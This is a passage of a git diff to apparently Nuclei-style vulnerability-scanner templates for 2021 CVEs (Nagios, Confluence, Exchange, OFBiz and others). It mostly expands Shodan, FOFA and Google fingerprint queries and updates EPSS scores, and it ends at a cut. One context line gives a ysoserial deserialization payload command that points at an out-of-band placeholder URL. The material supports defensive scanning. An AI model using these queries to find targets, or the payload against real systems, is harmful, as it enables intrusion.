+++ b/http/cves/2021/CVE-2021-25298.yaml @@ -29,8 +29,12 @@ info: max-request: 4 vendor: nagios product: nagios_xi - shodan-query: title:"Nagios XI" - fofa-query: title="nagios xi" + shodan-query: + - title:"Nagios XI" + - http.title:"nagios xi" + fofa-query: + - title="nagios xi" + - app="nagios-xi" google-query: intitle:"nagios xi" tags: cve2021,cve,packetstorm,oast,authenticated,msf,nagiosxi,rce,kev,nagios diff --git a/http/cves/2021/CVE-2021-25299.yaml b/http/cves/2021/CVE-2021-25299.yaml index 62fbab1f27..084f103c09 100644 --- a/http/cves/2021/CVE-2021-25299.yaml +++ b/http/cves/2021/CVE-2021-25299.yaml @@ -27,8 +27,12 @@ info: max-request: 3 vendor: nagios product: nagios_xi - shodan-query: title:"Nagios XI" - fofa-query: title="nagios xi" + shodan-query: + - title:"Nagios XI" + - http.title:"nagios xi" + fofa-query: + - title="nagios xi" + - app="nagios-xi" google-query: intitle:"nagios xi" tags: cve2021,cve,nagios,nagiosxi,xss,authenticated diff --git a/http/cves/2021/CVE-2021-25864.yaml b/http/cves/2021/CVE-2021-25864.yaml index 6581315c5b..84725781d2 100644 --- a/http/cves/2021/CVE-2021-25864.yaml +++ b/http/cves/2021/CVE-2021-25864.yaml @@ -27,7 +27,9 @@ info: vendor: dgtl product: huemagic framework: node.js - shodan-query: title:"NODE-RED" + shodan-query: + - title:"NODE-RED" + - http.title:"node-red" fofa-query: title="node-red" google-query: intitle:"node-red" tags: cve2021,cve,huemagic,lfi,dgtl,node.js diff --git a/http/cves/2021/CVE-2021-25899.yaml b/http/cves/2021/CVE-2021-25899.yaml index cdfecc4579..2f7efb86b4 100644 --- a/http/cves/2021/CVE-2021-25899.yaml +++ b/http/cves/2021/CVE-2021-25899.yaml @@ -20,14 +20,16 @@ info: cvss-score: 7.5 cve-id: CVE-2021-25899 cwe-id: CWE-89 - epss-score: 0.50721 - epss-percentile: 0.9747 + epss-score: 0.51506 + epss-percentile: 0.9756 cpe: cpe:2.3:a:void:aurall_rec_monitor:9.0.0.1:*:*:*:*:*:*:* metadata: max-request: 1 vendor: void product: aurall_rec_monitor - shodan-query: html:"AURALL" + shodan-query: + - html:"AURALL" + - http.html:"aurall" fofa-query: body="aurall" tags: cve2021,cve,sqli,void,aurall diff --git a/http/cves/2021/CVE-2021-26084.yaml b/http/cves/2021/CVE-2021-26084.yaml index d498bdb3d7..4e07f9cebb 100644 --- a/http/cves/2021/CVE-2021-26084.yaml +++ b/http/cves/2021/CVE-2021-26084.yaml @@ -27,7 +27,9 @@ info: max-request: 13 vendor: atlassian product: confluence_data_center - shodan-query: http.component:"Atlassian Confluence" + shodan-query: + - http.component:"Atlassian Confluence" + - http.component:"atlassian confluence" fofa-query: app="atlassian-confluence" tags: cve2021,cve,rce,confluence,injection,ognl,kev,atlassian diff --git a/http/cves/2021/CVE-2021-26085.yaml b/http/cves/2021/CVE-2021-26085.yaml index c391252e5f..b78d093874 100644 --- a/http/cves/2021/CVE-2021-26085.yaml +++ b/http/cves/2021/CVE-2021-26085.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: atlassian product: confluence_data_center - shodan-query: http.component:"Atlassian Confluence" + shodan-query: + - http.component:"Atlassian Confluence" + - http.component:"atlassian confluence" fofa-query: app="atlassian-confluence" tags: cve2021,cve,kev,packetstorm,confluence,atlassian,lfi,intrusive diff --git a/http/cves/2021/CVE-2021-26086.yaml b/http/cves/2021/CVE-2021-26086.yaml index bfc3013b37..3a73648a29 100644 --- a/http/cves/2021/CVE-2021-26086.yaml +++ b/http/cves/2021/CVE-2021-26086.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: atlassian product: jira_data_center - shodan-query: http.component:"Atlassian Jira" + shodan-query: + - http.component:"Atlassian Jira" + - http.component:"atlassian jira" tags: cve2021,cve,lfi,packetstorm,jira,intrusive,atlassian http: diff --git a/http/cves/2021/CVE-2021-26247.yaml b/http/cves/2021/CVE-2021-26247.yaml index 4b06d65837..f871104a01 100644 --- a/http/cves/2021/CVE-2021-26247.yaml +++ b/http/cves/2021/CVE-2021-26247.yaml @@ -26,9 +26,17 @@ info: max-request: 1 vendor: cacti product: cacti - fofa-query: icon_hash="-1797138069" - shodan-query: http.title:"login to cacti" - google-query: intitle:"cacti" + shodan-query: + - http.title:"login to cacti" + - http.title:"cacti" + - http.favicon.hash:"-1797138069" + fofa-query: + - icon_hash="-1797138069" + - title="cacti" + - title="login to cacti" + google-query: + - intitle:"cacti" + - intitle:"login to cacti" tags: cve,cve2021,cacti,xss http: diff --git a/http/cves/2021/CVE-2021-26292.yaml b/http/cves/2021/CVE-2021-26292.yaml index 5ecd600175..9cc5d1279f 100644 --- a/http/cves/2021/CVE-2021-26292.yaml +++ b/http/cves/2021/CVE-2021-26292.yaml @@ -16,7 +16,9 @@ info: max-request: 1 vendor: AfterLogic product: AfterLogic Aurora & WebMail - fofa-query: "X-Server: AfterlogicDAVServer" + fofa-query: + - "X-Server: AfterlogicDAVServer" + - "x-server: afterlogicdavserver" tags: cve2021,cve,afterlogic,path,disclosure,AfterLogic http: diff --git a/http/cves/2021/CVE-2021-26294.yaml b/http/cves/2021/CVE-2021-26294.yaml index 927eacdbd7..1f8caae574 100644 --- a/http/cves/2021/CVE-2021-26294.yaml +++ b/http/cves/2021/CVE-2021-26294.yaml @@ -25,7 +25,9 @@ info: max-request: 1 vendor: afterlogic product: aurora - fofa-query: "X-Server: AfterlogicDAVServer" + fofa-query: + - "X-Server: AfterlogicDAVServer" + - "x-server: afterlogicdavserver" tags: cve2021,cve,afterlogic,exposure,AfterLogic http: diff --git a/http/cves/2021/CVE-2021-26295.yaml b/http/cves/2021/CVE-2021-26295.yaml index 197400d710..bb71d92ba6 100644 --- a/http/cves/2021/CVE-2021-26295.yaml +++ b/http/cves/2021/CVE-2021-26295.yaml @@ -30,9 +30,14 @@ info: max-request: 1 vendor: apache product: ofbiz - shodan-query: "OFBiz.Visitor=" + shodan-query: + - "OFBiz.Visitor=" + - http.html:"ofbiz" + - ofbiz.visitor= + fofa-query: + - body="ofbiz" + - app="apache_ofbiz" ysoserial-payload: java -jar ysoserial.jar URLDNS https://oob-url-to-request.tld | hex - fofa-query: body="ofbiz" tags: cve2021,cve,packetstorm,apache,ofbiz,deserialization,rce http: diff --git a/http/cves/2021/CVE-2021-26598.yaml b/http/cves/2021/CVE-2021-26598.yaml index 898b06b8b6..f8ef1160d4 100644 --- a/http/cves/2021/CVE-2021-26598.yaml +++ b/http/cves/2021/CVE-2021-26598.yaml @@ -27,7 +27,10 @@ info: max-request: 2 vendor: impresscms product: impresscms - shodan-query: http.html:"ImpressCMS" + shodan-query: + - http.html:"ImpressCMS" + - cpe:"cpe:2.3:a:impresscms:impresscms" + - http.html:"impresscms" fofa-query: body="impresscms" tags: cve,cve2021,hackerone,impresscms,unauth,cms diff --git a/http/cves/2021/CVE-2021-26855.yaml b/http/cves/2021/CVE-2021-26855.yaml index 5bcdcb6729..41efeb4b3a 100644 --- a/http/cves/2021/CVE-2021-26855.yaml +++ b/http/cves/2021/CVE-2021-26855.yaml @@ -26,8 +26,14 @@ info: max-request: 1 vendor: microsoft product: exchange_server - shodan-query: vuln:CVE-2021-26855 - fofa-query: title="outlook" + shodan-query: + - vuln:CVE-2021-26855 + - http.favicon.hash:1768726119 + - http.title:"outlook" + - cpe:"cpe:2.3:a:microsoft:exchange_server" + fofa-query: + - title="outlook" + - icon_hash=1768726119 google-query: intitle:"outlook" tags: cve2021,cve,ssrf,rce,exchange,oast,microsoft,kev diff --git a/http/cves/2021/CVE-2021-27310.yaml b/http/cves/2021/CVE-2021-27310.yaml index 6f0dd6c4c8..73506d207b 100644 --- a/http/cves/2021/CVE-2021-27310.yaml +++ b/http/cves/2021/CVE-2021-27310.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-27310 cwe-id: CWE-79 epss-score: 0.00106 - epss-percentile: 0.42925 + epss-percentile: 0.43249 cpe: cpe:2.3:a:csphere:clansphere:2011.4:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-27330.yaml b/http/cves/2021/CVE-2021-27330.yaml index 3d3f2288f5..9f74dfe723 100644 --- a/http/cves/2021/CVE-2021-27330.yaml +++ b/http/cves/2021/CVE-2021-27330.yaml @@ -22,16 +22,18 @@ info: cve-id: CVE-2021-27330 cwe-id: CWE-79 epss-score: 0.00437 - epss-percentile: 0.74213 + epss-percentile: 0.74717 cpe: cpe:2.3:a:triconsole:datepicker_calendar:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: triconsole product: datepicker_calendar - google-query: intitle:TriConsole.com - PHP Calendar Date Picker shodan-query: http.title:triconsole.com - php calendar date picker fofa-query: title=triconsole.com - php calendar date picker + google-query: + - intitle:TriConsole.com - PHP Calendar Date Picker + - intitle:triconsole.com - php calendar date picker tags: cve2021,cve,xss,edb,triconsole http: diff --git a/http/cves/2021/CVE-2021-27358.yaml b/http/cves/2021/CVE-2021-27358.yaml index a7a43ae8dc..839a9faa52 100644 --- a/http/cves/2021/CVE-2021-27358.yaml +++ b/http/cves/2021/CVE-2021-27358.yaml @@ -27,8 +27,13 @@ info: max-request: 1 vendor: grafana product: grafana - shodan-query: title:"Grafana" - fofa-query: title="grafana" + shodan-query: + - title:"Grafana" + - cpe:"cpe:2.3:a:grafana:grafana" + - http.title:"grafana" + fofa-query: + - title="grafana" + - app="grafana" google-query: intitle:"grafana" tags: cve2021,cve,grafana,unauth diff --git a/http/cves/2021/CVE-2021-27519.yaml b/http/cves/2021/CVE-2021-27519.yaml index 357e052f09..699a2f51aa 100644 --- a/http/cves/2021/CVE-2021-27519.yaml +++ b/http/cves/2021/CVE-2021-27519.yaml @@ -29,8 +29,13 @@ info: max-request: 1 vendor: fudforum product: fudforum - shodan-query: 'http.html:"Powered by: FUDforum"' - fofa-query: 'body="powered by: fudforum"' + shodan-query: + - 'http.html:"Powered by: FUDforum"' + - http.html:"fudforum" + - 'http.html:"powered by: fudforum"' + fofa-query: + - 'body="powered by: fudforum"' + - body="fudforum" tags: cve2021,cve,xss,fudforum,edb,packetstorm http: diff --git a/http/cves/2021/CVE-2021-27520.yaml b/http/cves/2021/CVE-2021-27520.yaml index fa614240e8..ca034ef637 100644 --- a/http/cves/2021/CVE-2021-27520.yaml +++ b/http/cves/2021/CVE-2021-27520.yaml @@ -29,8 +29,13 @@ info: max-request: 2 vendor: fudforum product: fudforum - shodan-query: html:"FUDforum" - fofa-query: 'body="powered by: fudforum"' + shodan-query: + - html:"FUDforum" + - http.html:"fudforum" + - 'http.html:"powered by: fudforum"' + fofa-query: + - 'body="powered by: fudforum"' + - body="fudforum" tags: cve2021,cve,packetstorm,xss,fuddorum,edb,intrusive,fudforum http: diff --git a/http/cves/2021/CVE-2021-27670.yaml b/http/cves/2021/CVE-2021-27670.yaml index f5093d00c2..ba8becd142 100644 --- a/http/cves/2021/CVE-2021-27670.yaml +++ b/http/cves/2021/CVE-2021-27670.yaml @@ -20,15 +20,17 @@ info: cvss-score: 9.8 cve-id: CVE-2021-27670 cwe-id: CWE-918 - epss-score: 0.58348 - epss-percentile: 0.97664 + epss-score: 0.61228 + epss-percentile: 0.97796 cpe: cpe:2.3:a:appspace:appspace:6.2.4:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: appspace product: appspace - shodan-query: title:"Appspace" + shodan-query: + - title:"Appspace" + - http.title:"appspace" fofa-query: title="appspace" google-query: intitle:"appspace" tags: cve,cve2021,appspace,ssrf diff --git a/http/cves/2021/CVE-2021-27905.yaml b/http/cves/2021/CVE-2021-27905.yaml index d21940af9c..20f7526051 100644 --- a/http/cves/2021/CVE-2021-27905.yaml +++ b/http/cves/2021/CVE-2021-27905.yaml @@ -26,9 +26,16 @@ info: max-request: 2 vendor: apache product: solr - shodan-query: cpe:"cpe:2.3:a:apache:solr" - fofa-query: title="solr admin" - google-query: intitle:"apache solr" + shodan-query: + - cpe:"cpe:2.3:a:apache:solr" + - http.title:"apache solr" + - http.title:"solr admin" + fofa-query: + - title="solr admin" + - title="apache solr" + google-query: + - intitle:"apache solr" + - intitle:"solr admin" tags: cve2021,cve,apache,solr,ssrf http: diff --git a/http/cves/2021/CVE-2021-27909.yaml b/http/cves/2021/CVE-2021-27909.yaml index d4025871ed..8d2df8adee 100644 --- a/http/cves/2021/CVE-2021-27909.yaml +++ b/http/cves/2021/CVE-2021-27909.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: acquia product: mautic - shodan-query: title:"Mautic" + shodan-query: + - title:"Mautic" + - http.title:"mautic" fofa-query: title="mautic" google-query: intitle:"mautic" tags: cve2021,cve,mautic,xss,acquia diff --git a/http/cves/2021/CVE-2021-28151.yaml b/http/cves/2021/CVE-2021-28151.yaml index d826940e2f..651989990e 100644 --- a/http/cves/2021/CVE-2021-28151.yaml +++ b/http/cves/2021/CVE-2021-28151.yaml @@ -21,8 +21,8 @@ info: cvss-score: 8.8 cve-id: CVE-2021-28151 cwe-id: CWE-78 - epss-score: 0.96847 - epss-percentile: 0.99638 + epss-score: 0.96385 + epss-percentile: 0.99564 cpe: cpe:2.3:o:hongdian:h8922_firmware:3.0.5:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-29006.yaml b/http/cves/2021/CVE-2021-29006.yaml index 5e777cc46d..e79da76836 100644 --- a/http/cves/2021/CVE-2021-29006.yaml +++ b/http/cves/2021/CVE-2021-29006.yaml @@ -23,7 +23,9 @@ info: max-request: 3 vendor: rconfig product: rconfig - shodan-query: http.title:"rConfig" + shodan-query: + - http.title:"rConfig" + - http.title:"rconfig" fofa-query: title="rconfig" google-query: intitle:"rconfig" tags: cve2021,cve,rconfig,authenticated,lfi diff --git a/http/cves/2021/CVE-2021-29156.yaml b/http/cves/2021/CVE-2021-29156.yaml index a3db024d50..58ba081df6 100644 --- a/http/cves/2021/CVE-2021-29156.yaml +++ b/http/cves/2021/CVE-2021-29156.yaml @@ -26,7 +26,9 @@ info: max-request: 3 vendor: forgerock product: openam - shodan-query: http.title:"OpenAM" + shodan-query: + - http.title:"OpenAM" + - http.title:"openam" fofa-query: title="openam" google-query: intitle:"openam" tags: cve2021,cve,openam,ldap,injection,forgerock diff --git a/http/cves/2021/CVE-2021-29200.yaml b/http/cves/2021/CVE-2021-29200.yaml index dd4cd80f70..705f62e550 100644 --- a/http/cves/2021/CVE-2021-29200.yaml +++ b/http/cves/2021/CVE-2021-29200.yaml @@ -24,8 +24,14 @@ info: max-request: 1 vendor: apache product: ofbiz - shodan-query: html:"OFBiz" - fofa-query: app="Apache_OFBiz" + shodan-query: + - html:"OFBiz" + - http.html:"ofbiz" + - ofbiz.visitor= + fofa-query: + - app="Apache_OFBiz" + - body="ofbiz" + - app="apache_ofbiz" tags: cve2021,cve,apache,ofbiz,deserialization,rce http: diff --git a/http/cves/2021/CVE-2021-29484.yaml b/http/cves/2021/CVE-2021-29484.yaml index 52150037d9..bf949ed3a8 100644 --- a/http/cves/2021/CVE-2021-29484.yaml +++ b/http/cves/2021/CVE-2021-29484.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.8 cve-id: CVE-2021-29484 cwe-id: CWE-79 - epss-score: 0.01008 - epss-percentile: 0.82062 + epss-score: 0.01483 + epss-percentile: 0.86785 cpe: cpe:2.3:a:ghost:ghost:*:*:*:*:*:node.js:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-29625.yaml b/http/cves/2021/CVE-2021-29625.yaml index bfb9148867..3c9492f9cb 100644 --- a/http/cves/2021/CVE-2021-29625.yaml +++ b/http/cves/2021/CVE-2021-29625.yaml @@ -19,18 +19,22 @@ info: cvss-score: 6.1 cve-id: CVE-2021-29625 cwe-id: CWE-79 - epss-score: 0.00222 - epss-percentile: 0.60557 + epss-score: 0.00236 + epss-percentile: 0.61643 cpe: cpe:2.3:a:adminer:adminer:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: adminer product: adminer - shodan-query: http.title:"login - adminer" - fofa-query: app="adminer" && body="4.7.8" - hunter-query: app.name="adminer"&&web.body="4.7.8" + shodan-query: + - http.title:"login - adminer" + - cpe:"cpe:2.3:a:adminer:adminer" + fofa-query: + - app="adminer" && body="4.7.8" + - title="login - adminer" google-query: intitle:"login - adminer" - tags: cve2021,cve,adminer,xss + hunter-query: app.name="adminer"&&web.body="4.7.8" + tags: cve2021,cve,adminer,xss,sqli http: - method: GET diff --git a/http/cves/2021/CVE-2021-30128.yaml b/http/cves/2021/CVE-2021-30128.yaml index f88bf16dde..fb0f76cc0d 100644 --- a/http/cves/2021/CVE-2021-30128.yaml +++ b/http/cves/2021/CVE-2021-30128.yaml @@ -28,8 +28,13 @@ info: max-request: 1 vendor: apache product: ofbiz - fofa-query: app="Apache_OFBiz" - shodan-query: http.html:"ofbiz" + shodan-query: + - http.html:"ofbiz" + - ofbiz.visitor= + fofa-query: + - app="Apache_OFBiz" + - body="ofbiz" + - app="apache_ofbiz" tags: cve2021,cve,apache,ofbiz,deserialization,rce http: diff --git a/http/cves/2021/CVE-2021-30151.yaml b/http/cves/2021/CVE-2021-30151.yaml index 430af33ded..2fbe4aec89 100644 --- a/http/cves/2021/CVE-2021-30151.yaml +++ b/http/cves/2021/CVE-2021-30151.yaml @@ -27,7 +27,9 @@ info: max-request: 2 vendor: contribsys product: sidekiq - shodan-query: title:"Sidekiq" + shodan-query: + - title:"Sidekiq" + - http.title:"sidekiq" fofa-query: title="sidekiq" google-query: intitle:"sidekiq" tags: cve2021,cve,xss,sidekiq,authenticated,contribsys diff --git a/http/cves/2021/CVE-2021-30461.yaml b/http/cves/2021/CVE-2021-30461.yaml index e84522093d..5079a1b914 100644 --- a/http/cves/2021/CVE-2021-30461.yaml +++ b/http/cves/2021/CVE-2021-30461.yaml @@ -28,7 +28,9 @@ info: max-request: 1 vendor: voipmonitor product: voipmonitor - shodan-query: http.title:"VoIPmonitor" + shodan-query: + - http.title:"VoIPmonitor" + - http.title:"voipmonitor" fofa-query: title="voipmonitor" google-query: intitle:"voipmonitor" tags: cve2021,cve,rce,voipmonitor diff --git a/http/cves/2021/CVE-2021-31195.yaml b/http/cves/2021/CVE-2021-31195.yaml index f951cbae8d..c317eb1570 100644 --- a/http/cves/2021/CVE-2021-31195.yaml +++ b/http/cves/2021/CVE-2021-31195.yaml @@ -20,15 +20,21 @@ info: cvss-score: 6.5 cve-id: CVE-2021-31195 cwe-id: CWE-79 - epss-score: 0.92095 - epss-percentile: 0.98883 + epss-score: 0.92082 + epss-percentile: 0.98927 cpe: cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:* metadata: max-request: 1 vendor: microsoft product: exchange_server - shodan-query: http.title:"Outlook" - fofa-query: title="outlook" + shodan-query: + - http.title:"Outlook" + - http.favicon.hash:1768726119 + - http.title:"outlook" + - cpe:"cpe:2.3:a:microsoft:exchange_server" + fofa-query: + - title="outlook" + - icon_hash=1768726119 google-query: intitle:"outlook" tags: cve2021,cve,microsoft,exchange,owa,xss diff --git a/http/cves/2021/CVE-2021-3129.yaml b/http/cves/2021/CVE-2021-3129.yaml index 1cf253f02b..db25b63614 100644 --- a/http/cves/2021/CVE-2021-3129.yaml +++ b/http/cves/2021/CVE-2021-3129.yaml @@ -19,8 +19,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-3129 - epss-score: 0.97468 - epss-percentile: 0.99958 + epss-score: 0.97461 + epss-percentile: 0.99957 cpe: cpe:2.3:a:facade:ignition:*:*:*:*:*:laravel:*:* metadata: max-request: 6 diff --git a/http/cves/2021/CVE-2021-31589.yaml b/http/cves/2021/CVE-2021-31589.yaml index 1f9557aa0f..fae99b6e09 100644 --- a/http/cves/2021/CVE-2021-31589.yaml +++ b/http/cves/2021/CVE-2021-31589.yaml @@ -28,7 +28,9 @@ info: vendor: beyondtrust product: appliance_base_software shodan-query: 'set-cookie: nsbase_session' - google-query: '"BeyondTrust" "Redistribution Prohibited"' + google-query: + - '"BeyondTrust" "Redistribution Prohibited"' + - '"beyondtrust" "redistribution prohibited"' tags: cve,cve2021,xss,packetstorm,beyondtrust,bomgar http: diff --git a/http/cves/2021/CVE-2021-31602.yaml b/http/cves/2021/CVE-2021-31602.yaml index 32e43a9ad0..ab17ac7473 100644 --- a/http/cves/2021/CVE-2021-31602.yaml +++ b/http/cves/2021/CVE-2021-31602.yaml @@ -27,7 +27,9 @@ info: max-request: 2 vendor: hitachi product: vantara_pentaho - shodan-query: Pentaho + shodan-query: + - Pentaho + - pentaho tags: cve2021,cve,spring,seclists,pentaho,auth-bypass,hitachi http: diff --git a/http/cves/2021/CVE-2021-31682.yaml b/http/cves/2021/CVE-2021-31682.yaml index 35b27b217d..3068d76bfe 100644 --- a/http/cves/2021/CVE-2021-31682.yaml +++ b/http/cves/2021/CVE-2021-31682.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: automatedlogic product: webctrl - shodan-query: html:"/_common/lvl5/dologin.jsp" + shodan-query: + - html:"/_common/lvl5/dologin.jsp" + - http.html:"/_common/lvl5/dologin.jsp" fofa-query: body="/_common/lvl5/dologin.jsp" tags: cve2021,cve,webctrl,xss,packetstorm,automatedlogic diff --git a/http/cves/2021/CVE-2021-31805.yaml b/http/cves/2021/CVE-2021-31805.yaml index 7b1d9a38ef..49739deaaa 100644 --- a/http/cves/2021/CVE-2021-31805.yaml +++ b/http/cves/2021/CVE-2021-31805.yaml @@ -26,8 +26,14 @@ info: max-request: 1 vendor: apache product: struts - shodan-query: http.html:"apache struts" - fofa-query: body="struts problem report" + shodan-query: + - http.html:"apache struts" + - http.title:"struts2 showcase" + - http.html:"struts problem report" + fofa-query: + - body="struts problem report" + - title="struts2 showcase" + - body="apache struts" google-query: intitle:"struts2 showcase" tags: cve2021,cve,apache,rce,struts,struts2,intrusive diff --git a/http/cves/2021/CVE-2021-3223.yaml b/http/cves/2021/CVE-2021-3223.yaml index 996e0578de..27ff28a506 100644 --- a/http/cves/2021/CVE-2021-3223.yaml +++ b/http/cves/2021/CVE-2021-3223.yaml @@ -29,8 +29,12 @@ info: vendor: nodered product: node-red-dashboard framework: node.js - shodan-query: title:"Node-RED" - fofa-query: title="Node-RED" + shodan-query: + - title:"Node-RED" + - http.title:"node-red" + fofa-query: + - title="Node-RED" + - title="node-red" google-query: intitle:"node-red" tags: cve,cve2021,node-red-dashboard,lfi,nodered,node.js diff --git a/http/cves/2021/CVE-2021-32682.yaml b/http/cves/2021/CVE-2021-32682.yaml index 8eb0ec9383..fb1ab567f9 100644 --- a/http/cves/2021/CVE-2021-32682.yaml +++ b/http/cves/2021/CVE-2021-32682.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-32682 cwe-id: CWE-22 - epss-score: 0.97293 - epss-percentile: 0.99854 + epss-score: 0.97312 + epss-percentile: 0.99872 cpe: cpe:2.3:a:std42:elfinder:*:*:*:*:*:*:*:* metadata: max-request: 9 diff --git a/http/cves/2021/CVE-2021-32819.yaml b/http/cves/2021/CVE-2021-32819.yaml index f07fb8d440..ebe04e5e7c 100644 --- a/http/cves/2021/CVE-2021-32819.yaml +++ b/http/cves/2021/CVE-2021-32819.yaml @@ -21,8 +21,8 @@ info: cvss-score: 8.8 cve-id: CVE-2021-32819 cwe-id: CWE-200,NVD-CWE-noinfo - epss-score: 0.82753 - epss-percentile: 0.98332 + epss-score: 0.79486 + epss-percentile: 0.98284 cpe: cpe:2.3:a:squirrelly:squirrelly:8.0.8:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-3293.yaml b/http/cves/2021/CVE-2021-3293.yaml index 30cb8939c1..7e60b23e15 100644 --- a/http/cves/2021/CVE-2021-3293.yaml +++ b/http/cves/2021/CVE-2021-3293.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-3293 cwe-id: CWE-22 epss-score: 0.003 - epss-percentile: 0.68887 + epss-percentile: 0.69462 cpe: cpe:2.3:a:emlog:emlog:5.3.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-33544.yaml b/http/cves/2021/CVE-2021-33544.yaml index 75ae78ab72..316579151c 100644 --- a/http/cves/2021/CVE-2021-33544.yaml +++ b/http/cves/2021/CVE-2021-33544.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.2 cve-id: CVE-2021-33544 cwe-id: CWE-78 - epss-score: 0.9753 - epss-percentile: 0.99991 + epss-score: 0.97493 + epss-percentile: 0.99976 cpe: cpe:2.3:h:geutebrueck:g-cam_ebc-2110:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-33690.yaml b/http/cves/2021/CVE-2021-33690.yaml index 041384d150..90f483b42a 100644 --- a/http/cves/2021/CVE-2021-33690.yaml +++ b/http/cves/2021/CVE-2021-33690.yaml @@ -26,7 +26,9 @@ info: max-request: 1 vendor: sap product: netweaver_development_infrastructure - shodan-query: html:"SAP NetWeaver" + shodan-query: + - html:"SAP NetWeaver" + - http.html:"sap netweaver" fofa-query: body="sap netweaver" tags: cve2021,cve,oast,ssrf,sap diff --git a/http/cves/2021/CVE-2021-34473.yaml b/http/cves/2021/CVE-2021-34473.yaml index 0eb4aee6b5..9a328c8e7f 100644 --- a/http/cves/2021/CVE-2021-34473.yaml +++ b/http/cves/2021/CVE-2021-34473.yaml @@ -27,8 +27,14 @@ info: max-request: 2 vendor: microsoft product: exchange_server - shodan-query: vuln:cve-2021-26855 - fofa-query: title="outlook" + shodan-query: + - vuln:cve-2021-26855 + - http.favicon.hash:1768726119 + - http.title:"outlook" + - cpe:"cpe:2.3:a:microsoft:exchange_server" + fofa-query: + - title="outlook" + - icon_hash=1768726119 google-query: intitle:"outlook" tags: cve2021,cve,ssrf,rce,exchange,kev,microsoft diff --git a/http/cves/2021/CVE-2021-35250.yaml b/http/cves/2021/CVE-2021-35250.yaml index 60fdac9283..7a628b7c10 100644 --- a/http/cves/2021/CVE-2021-35250.yaml +++ b/http/cves/2021/CVE-2021-35250.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: solarwinds product: serv-u - shodan-query: product:"Rhinosoft Serv-U httpd" + shodan-query: + - product:"Rhinosoft Serv-U httpd" + - product:"rhinosoft serv-u httpd" tags: cve2021,cve,solarwinds,traversal http: diff --git a/http/cves/2021/CVE-2021-35265.yaml b/http/cves/2021/CVE-2021-35265.yaml index 05474adf1f..7c44f4757d 100644 --- a/http/cves/2021/CVE-2021-35265.yaml +++ b/http/cves/2021/CVE-2021-35265.yaml @@ -28,7 +28,9 @@ info: max-request: 2 vendor: maxsite product: maxsite_cms - shodan-query: html:'content="MaxSite CMS' + shodan-query: + - html:'content="MaxSite CMS' + - http.html:'content="maxsite cms' fofa-query: body='content="maxsite cms' tags: cve2021,cve,maxsite,xss diff --git a/http/cves/2021/CVE-2021-35323.yaml b/http/cves/2021/CVE-2021-35323.yaml index d021d01f7b..1992bae6dd 100644 --- a/http/cves/2021/CVE-2021-35323.yaml +++ b/http/cves/2021/CVE-2021-35323.yaml @@ -10,20 +10,25 @@ info: reference: - https://github.com/bludit/bludit/issues/1327 - https://nvd.nist.gov/vuln/detail/CVE-2021-35323 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-35323 cwe-id: CWE-79 epss-score: 0.00183 - epss-percentile: 0.55601 + epss-percentile: 0.55471 cpe: cpe:2.3:a:bludit:bludit:3.13.1:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: bludit product: bludit - shodan-query: title:"Bludit" + shodan-query: + - title:"Bludit" + - http.title:"bludit" + fofa-query: title="bludit" + google-query: intitle:"bludit" tags: cve2021,cve,bludit,xss http: diff --git a/http/cves/2021/CVE-2021-35380.yaml b/http/cves/2021/CVE-2021-35380.yaml index b596169069..5df0c0315c 100644 --- a/http/cves/2021/CVE-2021-35380.yaml +++ b/http/cves/2021/CVE-2021-35380.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-35380 cwe-id: CWE-22 - epss-score: 0.23467 - epss-percentile: 0.96147 + epss-score: 0.45222 + epss-percentile: 0.97404 cpe: cpe:2.3:a:solari:termtalk_server:3.24.0.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-35464.yaml b/http/cves/2021/CVE-2021-35464.yaml index 6e7608bbc4..75bf911c4a 100644 --- a/http/cves/2021/CVE-2021-35464.yaml +++ b/http/cves/2021/CVE-2021-35464.yaml @@ -31,7 +31,9 @@ info: max-request: 1 vendor: forgerock product: am - shodan-query: http.title:"OpenAM" + shodan-query: + - http.title:"OpenAM" + - http.title:"openam" fofa-query: title="openam" google-query: intitle:"openam" tags: cve,cve2021,packetstorm,openam,rce,java,kev,forgerock diff --git a/http/cves/2021/CVE-2021-35488.yaml b/http/cves/2021/CVE-2021-35488.yaml index 34328efc7b..8c8d8d6662 100644 --- a/http/cves/2021/CVE-2021-35488.yaml +++ b/http/cves/2021/CVE-2021-35488.yaml @@ -29,8 +29,12 @@ info: max-request: 1 vendor: thruk product: thruk - shodan-query: http.html:"Thruk" - fofa-query: body="thruk" + shodan-query: + - http.html:"Thruk" + - http.html:"thruk" + fofa-query: + - body="thruk" + - title=="thruk monitoring webinterface" tags: cve2021,cve,thruk,xss http: diff --git a/http/cves/2021/CVE-2021-35587.yaml b/http/cves/2021/CVE-2021-35587.yaml index deaa0807fd..67895a4fe6 